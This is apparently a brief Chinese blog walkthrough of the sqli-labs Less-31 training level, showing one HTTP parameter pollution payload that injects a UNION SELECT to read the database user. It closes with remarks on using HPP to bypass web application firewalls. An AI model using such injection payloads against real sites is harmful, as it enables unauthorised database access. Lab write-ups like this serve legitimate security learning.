Sqli-labs less 31
Less-31
Less-31与上述两个例子的方式是一样的,我们直接看到less-31的sql语句:
所以payload为:
http://127.0.0.1:8080/sqli-labs/Less-31/index.jsp?id=1&id=-2%22)union%20select%201,user(),3--+
总结:从以上三关中,我们主要学习到的是不同服务器对于参数的不同处理,HPP的应用有很多,不仅仅是我们上述列出过WAF一个方面,还有可以执行重复操作,可以执行非法操作等。同时针对WAF的绕过,我们这里也仅仅是抛砖引玉,后续的很多的有关HPP的方法需要共同去研究。这也是一个新的方向。
微信公众号:埋头干安全
目前主要精力放在微信公众号!!!